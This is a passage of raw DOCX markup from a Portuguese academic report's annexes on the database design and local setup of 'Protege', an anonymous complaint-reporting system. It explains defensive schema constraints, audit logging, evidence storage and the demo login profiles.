        </w:rPr>
        <w:t xml:space="preserve">DENUNCIA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">concentra 24 colunas e 12 restrições. Três merecem explicação.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Coerência temporal.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Não se conclui antes de registrar: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ck_denuncia_conclusao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(concluida_em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concluida_em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criado_em)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sem ela, um erro de fuso ou uma carga malfeita produziria tempo de resposta negativo, e a estatística da Parte 4 passaria a mentir sem que nada quebrasse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anonimato imposto pelo banco.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ck_denuncia_anonimato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(anonimo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cidadao_id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Uma denúncia anônima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não pode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ter denunciante vinculado. A regra que protege a vítima não depende de a aplicação lembrar de aplicá-la: nem um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manual no SQL Developer consegue violá-la. Ela materializa no banco a garantia que o Decreto 9.492/2018 dá ao denunciante anônimo (BRASIL, 2018c, art. 23, §2.º).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusão que exige destruição do conteúdo.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ck_denuncia_exclusao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excluida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(motivo_exclusao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excluida_em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descricao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endereco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Não existe caminho que marque uma denúncia como excluída deixando o relato para trás. O direito de eliminação (BRASIL, 2018a, art. 18, VI) e o dever de rastreabilidade da administração pública convivem porque a restrição obriga os dois ao mesmo tempo: o conteúdo some, o registro fica.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:id="137" w:name="a.3-a-linha-do-tempo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.3 A linha do tempo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DENUNCIA_HISTORICO (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    denuncia_id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ordem       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 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hora         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VARCHAR2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denuncia_historico_pk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(denuncia_id, ordem),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historico_denuncia_fk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(denuncia_id)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DENUNCIA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ck_historico_data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REGEXP_LIKE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data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'^[0-9]{2}/[0-9]{2}/[0-9]{4}$'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ck_historico_hora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REGEXP_LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hora, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'^[0-9]{2}:[0-9]{2}$'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É a única</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chave primária composta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do modelo, e ela é o que garante a ordem: o par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(denuncia_id, ordem)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">impede dois eventos na mesma posição. Corresponde ao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@OrderColumn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da entidade JPA, de modo que a posição é um dado persistido e não uma coincidência de leitura.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="137"/>
    <w:bookmarkStart w:id="138" w:name="a.4-trilha-de-auditoria"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.4 Trilha de auditoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AUDITORIA_LOG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guarda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_anterior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hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, formando o encadeamento descrito na Parte 5. O comentário da coluna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detalhe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">registra a regra que a torna segura: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Descrição curta e NÃO sensível. O relato da denúncia jamais entra aqui.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uma trilha que copiasse o relato para poder dar contexto viraria uma segunda cópia do dado sensível, com acesso mais amplo que o original, já que auditores a leem. A regra ecoa a orientação da OWASP de nunca registrar informação privada ou secreta em log (OWASP, [s.d.]g).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="138"/>
    <w:bookmarkStart w:id="139" w:name="a.5-evidências"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.5 Evidências</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nesta fase,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EVIDENCIA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deixou de ser tabela apenas prevista e ganhou entidade JPA, endpoints e restrições próprias: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ck_evidencia_tipo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(tipo_conteudo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'image/jpeg'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'image/png'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'image/webp'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'application/pdf'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'audio/mpeg'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'audio/ogg'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'audio/webm'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'video/mp4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)),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ck_evidencia_tamanho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(tamanho_bytes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">BETWEEN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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/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ck_evidencia_hash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REGEXP_LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hash_sha256, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'^[0-9a-f]{64}$'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A lista branca de formatos aparece</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">duas vezes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no sistema: na aplicação, que verifica a assinatura do arquivo, e aqui. Não é redundância descuidada, é defesa em profundidade. Se um dia a validação da aplicação for contornada, não entra registro de formato que o canal não aceita.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A tabela guarda apenas metadado. O binário fica no sistema de arquivos, fora da pasta servida pelo servidor web, com nome gerado, conforme recomenda a OWASP para armazenamento de arquivos enviados (OWASP, [s.d.]c). Gravar 5 MB por linha incharia o backup, atrasaria toda consulta à tabela e transformaria o dump do banco num vazamento de todas as evidências de uma vez.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="139"/>
    <w:bookmarkStart w:id="140" w:name="a.6-senha-o-banco-também-sabe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.6 Senha: o banco também sabe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ck_servidor_hash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(senha_hash)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Um hash BCrypt tem 60 caracteres. Qualquer tentativa de gravar senha em texto puro, que raramente passa de 20, é recusada pelo banco. É a última linha de defesa contra um erro de programação em qualquer camada acima, e o complemento no banco da recomendação de armazenar senhas apenas com algoritmo lento e de custo configurável (OWASP, [s.d.]a).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkStart w:id="141" w:name="Xc0a81578968a59648ee22c1012ed7730409231b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.7 Contato obrigatório do cidadão identificado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">CONSTRAINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ck_cidadao_contato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(email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telefone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Se alguém escolhe se identificar, é para poder ser contatado. Uma linha em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CIDADAO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sem nenhum canal de retorno guarda dado pessoal sem servir a propósito nenhum, que é exatamente o que o princípio da necessidade proíbe (BRASIL, 2018a, art. 6.º, III).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkStart w:id="142" w:name="a.8-reinício-das-sequências"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.8 Reinício das sequências</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A carga insere com id explícito, o que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">avança a sequência interna das colunas IDENTITY. Sem o bloco final, o primeiro insert automático da aplicação tentaria reutilizar um id ocupado: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DENUNCIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MODIFY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GENERATED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IDENTITY (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">START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126</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">É o tipo de detalhe que só aparece quando alguém tenta usar o banco depois de carregá-lo, e que teria quebrado a primeira denúncia registrada em produção.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkStart w:id="143" w:name="a.9-evolução-desde-a-fase-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.9 Evolução desde a Fase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356"/>
        <w:gridCol w:w="2046"/>
        <w:gridCol w:w="15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Restrições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Chaves estrangeiras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declaradas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Comentários de tabela e coluna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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entraram</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PERFIL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MEMBRO_EQUIPE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DENUNCIA_HISTORICO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AUDITORIA_LOG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; saiu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HISTORICO_STATUS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, absorvida pela primeira. Toda coluna numérica passou a declarar precisão, atendendo à ressalva D2, e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DENUNCIA.tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deixou de ser texto solto para se tornar chave estrangeira do domínio.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:bookmarkStart w:id="144" w:name="a.10-os-três-scripts-entregues"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.10 Os três scripts entregues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28"/>
        <w:gridCol w:w="4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database/01_ddl_oracle.sql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Criação completa: tabelas, restrições, índices, comentários e reinício de sequências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database/02_dml_carga.sql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mesmas 125 denúncias e 201 eventos de histórico da base analisada na Parte 4, em sintaxe Oracle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database/03_consultas.sql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Consultas de verificação, que reproduzem os números do relatório estatístico diretamente no banco</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O terceiro é o que permite conferir este documento sem subir a aplicação: as medidas da seção 4.2 podem ser recalculadas em SQL e comparadas com o que o painel exibe. Os percentis usam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PERCENTILE_CONT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que assume distribuição contínua e devolve valor interpolado (ORACLE, [s.d.]), exatamente a convenção adotada pelo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EstatisticaService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="144"/>
    <w:bookmarkEnd w:id="145"/>
    <w:bookmarkStart w:id="153" w:name="anexo-b-como-executar-e-como-verificar"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anexo B: Como executar e como verificar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este anexo existe para que qualquer afirmação deste documento possa ser conferida na própria aplicação, sem depender de vídeo e sem instalar banco de dados.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="146" w:name="b.1-o-que-é-preciso-ter-instalado"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.1 O que é preciso ter instalado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970"/>
        <w:gridCol w:w="37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 ou superior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Único requisito obrigatório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necessário instalar no Windows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build.cmd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">baixa o Apache Maven na primeira execução. No Linux e no macOS, use o</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mvn</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">já instalado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é necessário instalar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perfil</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">h2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">usa banco embutido em arquivo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3.x, opcional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Apenas para servir o front-end por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qualquer moderno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Chrome, Edge ou Firefox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="146"/>
    <w:bookmarkStart w:id="147" w:name="b.2-subir-a-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.2 Subir a API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na pasta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:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No Windows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">build.cmd run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build.cmd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chama o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">build.ps1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que resolve o Maven em três passos: usa o do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se existir, senão a cópia já baixada em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%USERPROFILE%\.protege-maven</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, senão baixa a distribuição oficial do Apache uma única vez. É o que permite cumprir a exigência de o projeto funcionar ao ser descompactado, sem pedir instalação prévia de Maven.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No Linux ou macOS, com o Maven no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH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mvn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> spring-boot:run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-Dspring-boot.run.profiles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h2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A API sobe em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:8080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Na primeira execução, a carga inicial insere as 125 denúncias e os 201 eventos de histórico descritos na seção 4.2.1. A carga é idempotente, então reiniciar não duplica registros.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verificação rápida de que subiu corretamente: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Endereço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deve aparecer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http://localhost:8080/swagger-ui.html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documentação executável, com as 31 rotas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http://localhost:8080/api/vigia/status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informando o modo da IA,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GEMINI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REGRAS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http://localhost:8080/api/denuncias/protocolo/2026-00451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 caso da base, pelo canal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http://localhost:8080/h2-console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Console do banco de demonstração. JDBC</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">jdbc:h2:file:./data/protege</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, usuário</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sa</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, sem senha</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="147"/>
    <w:bookmarkStart w:id="148" w:name="b.3-abrir-o-front-end"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.3 Abrir o front-end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O modo recomendado é servir por HTTP, na pasta raiz do projeto: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http.server 5500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E abrir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:5500/index.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abrir o arquivo diretamente pelo Explorador de Arquivos também funciona, e o projeto foi preparado para isso, porque a entrega exige que funcione ao descompactar. Nesse caso o endereço fica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file:///...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e o módulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">conexao.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exibe um aviso explicando que algumas chamadas podem ser bloqueadas pela política de origem do navegador. Servir por HTTP evita esse aviso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Três páginas: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32"/>
        <w:gridCol w:w="44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Portal do cidadão e painel do órgão, na mesma aplicação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formulario-react.html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interface React que consome a API, exigida pelo enunciado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página de disfarce do Modo Seguro, para onde o botão de pânico redireciona</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="148"/>
    <w:bookmarkStart w:id="149" w:name="b.4-os-perfis-de-demonstração"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.4 Os perfis de demonstração</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O painel permite autenticar com quatro perfis distintos, e é essa troca que demonstra o controle de acesso da Parte 5. Os endereços de e-mail são os seguintes, e a senha de demonstração está indicada na própria tela de login e no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">README</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do projeto: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20"/>
        <w:gridCol w:w="2683"/>
        <w:gridCol w:w="1374"/>
        <w:gridCol w:w="314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Perfil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ele demonstra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ATENDENTE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atendente@protege.gov.br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atendente123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mascarado, sem botão de exclusão, 403 na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GESTOR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gestor@protege.gov.br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gestor123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Endereço completo, exclusão disponível, 403 na auditoria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auditor@protege.gov.br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Trilha completa, sem acesso ao relato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admin@protege.gov.br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pleno, integralmente auditado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As quatro contas são criadas na primeira execução pelo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
